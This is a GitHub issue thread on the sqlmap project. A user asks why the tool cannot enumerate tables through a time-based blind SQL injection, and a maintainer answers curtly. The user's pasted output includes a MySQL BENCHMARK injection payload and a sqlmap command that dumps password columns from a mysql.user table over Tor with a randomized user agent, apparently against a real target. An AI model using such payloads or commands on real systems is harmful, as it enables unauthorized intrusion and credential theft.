search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.17k stars 5.68k forks source link

time based blind #660

Closed testerqwerty closed 10 years ago

testerqwerty commented 10 years ago

Heavy quries why sqlmap cant enumerate table names and columns names from enumerated database? switch --dbs

Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: test=' AND 1356=BENCHMARK(10000000,MD5(0x6d65436e)) AND 'erCv'='erCv&submit=submit

---

[ERROR] unable to retrieve the number of databases
[INFO] falling back to current database
[INFO] fetching current database
[INFO] resumed: mysql
available databases [1]:
[*] mysql

switch --tables -D mysql
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 4.4.7
back-end DBMS: MySQL < 5.0.0
[ERROR] information_schema not available, back-end DBMS is MySQL < 5.
0
do you want to use common table existence check? [y/N/q] N
No tables found

switch --common-tables return bulshit

stamparm commented 10 years ago

It can. Please don't spam with this kind of issues without any info. On Apr 2, 2014 8:14 PM, "testerqwerty" notifications@github.com wrote:

why sqlmap cant enumerate table names and columns names from enumerated database?

Reply to this email directly or view it on GitHubhttps://github.com/sqlmapproject/sqlmap/issues/660 .

testerqwerty commented 10 years ago

One more problem, blank fields enumerating wtf?

sqlmap.py -u "example.com" --tor --tor-port=9150 --tor-type=socks5 --check-tor --batch --random-agent --hex --dump -D mysql -T user -C id,password --count --threads=10

[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[INFO] resumed: 2672
Database: mysql
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 2672    |
+--------+---------+

[INFO] fetching columns 'id, password' for table 'user' in data base 'mysql'
[WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[WARNING] it's highly recommended to avoid usage of switch '--tor' for time-based injections because of its high latency time
[WARNING] time-based comparison requires larger statistical model, please wait.............................
[WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[INFO] retrieved:
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[WARNING] unable to retrieve column names for table 'user' in database 'mysql'
[23:07:58] [INFO] fetching entries of column(s) 'id, password' for table 'user' in database 'mysql'
[23:07:58] [INFO] fetching number of column(s) 'id, password' entries for
table 'user' in database 'mysql'
[23:07:58] [INFO] resumed: 2672
[23:07:58] [INFO] resumed: 2671
[23:07:58] [INFO] resumed: 2672
[23:08:05] [INFO] retrieved:
[23:08:11] [INFO] retrieved:
[23:08:19] [INFO] retrieved:
[23:08:26] [INFO] retrieved:
[23:08:32] [INFO] retrieved:
[23:08:39] [INFO] retrieved:
[23:08:46] [INFO] retrieved:
[23:08:46] [INFO] retrieved:
testerqwerty commented 10 years ago

first count fields then [ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql' [WARNING] unable to retrieve column names for table 'user' in database 'mysql'

wtf?

stamparm commented 10 years ago

It's time based and you use Tor. In your place I would restrain myself from opening wtf issues

testerqwerty commented 10 years ago

without using tor all the same

ghost commented 10 years ago

stamparm.....how about you take the stick out of your ass, eh? Jesh....seriously..Why do you even do this? I read your comments; they're consistently condescending and unhelpful. Are you a cop or something?